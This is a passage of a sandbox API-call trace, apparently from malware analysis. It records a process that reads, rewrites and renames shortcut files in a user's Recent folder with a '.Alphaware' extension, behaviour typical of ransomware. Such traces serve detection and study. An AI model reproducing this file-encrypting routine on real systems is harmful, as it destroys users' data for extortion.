hTemplateFile=0x0) returned 0x250 [0099.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\y- 0.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d78bd80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc8)) returned 1 [0099.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.447] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\y- 0.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\y- 0.lnk.alphaware")) returned 1 [0099.448] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk", dwFileAttributes=0x80) returned 1 [0099.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yjr9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24e0e10 | out: lpFileInformation=0x24e0e10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0301100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0301100, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x34e)) returned 1 [0099.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.449] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yjr9.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.449] ReadFile (in: hFile=0x250, lpBuffer=0x24e13f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24e13f8*, lpNumberOfBytesRead=0x23e958*=0x34e, lpOverlapped=0x0) returned 1 [0099.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.472] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yjr9.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yjr9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0301100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d7d8040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x534)) returned 1 [0099.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.474] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yjr9.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yjr9.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yjr9.lnk.alphaware")) returned 1 [0099.476] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk", dwFileAttributes=0x80) returned 1 [0099.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.476] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yqlr.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25622e0 | out: lpFileInformation=0x25622e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce7a1400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd148f340, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd148f340, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xd4e)) returned 1 [0099.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.476] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yqlr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.477] ReadFile (in: hFile=0x250, lpBuffer=0x25632e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25632e0*, lpNumberOfBytesRead=0x23e958*=0xd4e, lpOverlapped=0x0) returned 1 [0099.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.500] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yqlr.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yqlr.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce7a1400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd148f340, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d824300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1288)) returned 1 [0099.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.503] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yqlr.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yQlR.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yqlr.lnk.alphaware")) returned 1 [0099.504] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk", dwFileAttributes=0x80) returned 1 [0099.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yyaadtzvoxxesxd.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25ea970 | out: lpFileInformation=0x25ea970*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd06df4c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1868)) returned 1 [0099.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.505] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yyaadtzvoxxesxd.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.505] ReadFile (in: hFile=0x250, lpBuffer=0x25eac48, nNumberOfBytesToRead=0x1868, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25eac48*, lpNumberOfBytesRead=0x23e958*=0x1868, lpOverlapped=0x0) returned 1 [0099.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.531] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yyaadtzvoxxesxd.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.534] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yyaadtzvoxxesxd.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d8705c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2160)) returned 1 [0099.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.534] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yyaadtzvoxxesxd.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YYaadTzVoXXESXd.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\yyaadtzvoxxesxd.lnk.alphaware")) returned 1 [0099.536] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk", dwFileAttributes=0x80) returned 1 [0099.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.536] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z3zxfx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x247ab78 | out: lpFileInformation=0x247ab78*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd15bfe40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15bfe40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2ce)) returned 1 [0099.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.536] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z3zxfx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.536] ReadFile (in: hFile=0x250, lpBuffer=0x247b0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x247b0f8*, lpNumberOfBytesRead=0x23e958*=0x2ce, lpOverlapped=0x0) returned 1 [0099.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.559] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z3zxfx.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.562] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z3zxfx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15bfe40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d896720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x488)) returned 1 [0099.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.562] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z3zxfx.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z3ZXfX.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z3zxfx.lnk.alphaware")) returned 1 [0099.564] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk", dwFileAttributes=0x80) returned 1 [0099.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.564] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z8zs.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24fbac0 | out: lpFileInformation=0x24fbac0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1018a00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdaa)) returned 1 [0099.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.564] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z8zs.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.564] ReadFile (in: hFile=0x250, lpBuffer=0x24fcb20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24fcb20*, lpNumberOfBytesRead=0x23e958*=0xdaa, lpOverlapped=0x0) returned 1 [0099.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.587] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z8zs.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z8zs.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d8e29e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1308)) returned 1 [0099.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.590] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z8zs.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\z8zS.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\z8zs.lnk.alphaware")) returned 1 [0099.591] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk", dwFileAttributes=0x80) returned 1 [0099.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ziojla1 q-sxsl2w5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2584598 | out: lpFileInformation=0x2584598*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11957c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa0b)) returned 1 [0099.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.592] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ziojla1 q-sxsl2w5.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.592] ReadFile (in: hFile=0x250, lpBuffer=0x25852b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25852b8*, lpNumberOfBytesRead=0x23e958*=0xa0b, lpOverlapped=0x0) returned 1 [0099.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.618] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ziojla1 q-sxsl2w5.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ziojla1 q-sxsl2w5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d92eca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe34)) returned 1 [0099.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.621] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ziojla1 q-sxsl2w5.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZiOJla1 Q-SXSl2W5.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ziojla1 q-sxsl2w5.lnk.alphaware")) returned 1 [0099.622] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk", dwFileAttributes=0x80) returned 1 [0099.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zkwjy960tnphzx9r1d2d.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2409d28 | out: lpFileInformation=0x2409d28*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd13f6dc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13f6dc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13f6dc0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf5d)) returned 1 [0099.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.623] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zkwjy960tnphzx9r1d2d.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.623] ReadFile (in: hFile=0x250, lpBuffer=0x240afb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x240afb8*, lpNumberOfBytesRead=0x23e958*=0xf5d, lpOverlapped=0x0) returned 1 [0099.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.646] CreateFileW 